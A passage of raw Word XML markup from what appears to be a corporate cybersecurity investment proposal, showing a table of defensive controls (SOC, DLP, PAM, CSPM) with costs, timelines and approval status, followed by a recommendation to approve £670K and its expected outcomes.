          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>24/7 SOC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£200K</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>90 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">80% dwell time reduction </w:t>
            </w:r>
            <w:r w:rsidR="00372D62" w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>[59]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>APPROVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidTr="00086687">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>DLP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£120K</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>90 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">85% data exfiltration </w:t>
            </w:r>
            <w:r w:rsidR="00372D62" w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>[60]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>APPROVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidTr="00086687">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>PAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£160K</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>120 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">75% privilege escalation </w:t>
            </w:r>
            <w:r w:rsidR="00372D62" w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>[63]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>APPROVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidTr="00086687">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>PAM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£175K</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>180 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">70% lateral movement </w:t>
            </w:r>
            <w:r w:rsidR="00372D62" w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>[64]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00086687">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>PHASE 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidTr="00086687">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>CSPM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£50K</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1558" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>60 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">90% cloud </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>misconfig</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00372D62" w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>[61]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00086687" w:rsidRPr="00C57BFC" w:rsidRDefault="00086687" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>APPROVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Final Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>Approve £670K initial investment** (MFA + EDR + SOC + DLP + CSPM + Training) for immediate deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Expected Outcomes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Reduce breach probability from 45% to 8% annually</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Decrease dwell ti</w:t>
      </w:r>
      <w:r w:rsidR="00372D62" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>me from 13 days to &lt;24 hours [57</w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Achieve 95% protection against demonstrated attack vectors</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Meet regulatory compliance requirements (GDPR, HIPAA)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t>- Realize 19:1 ROI within first year</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00DF2AC1" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
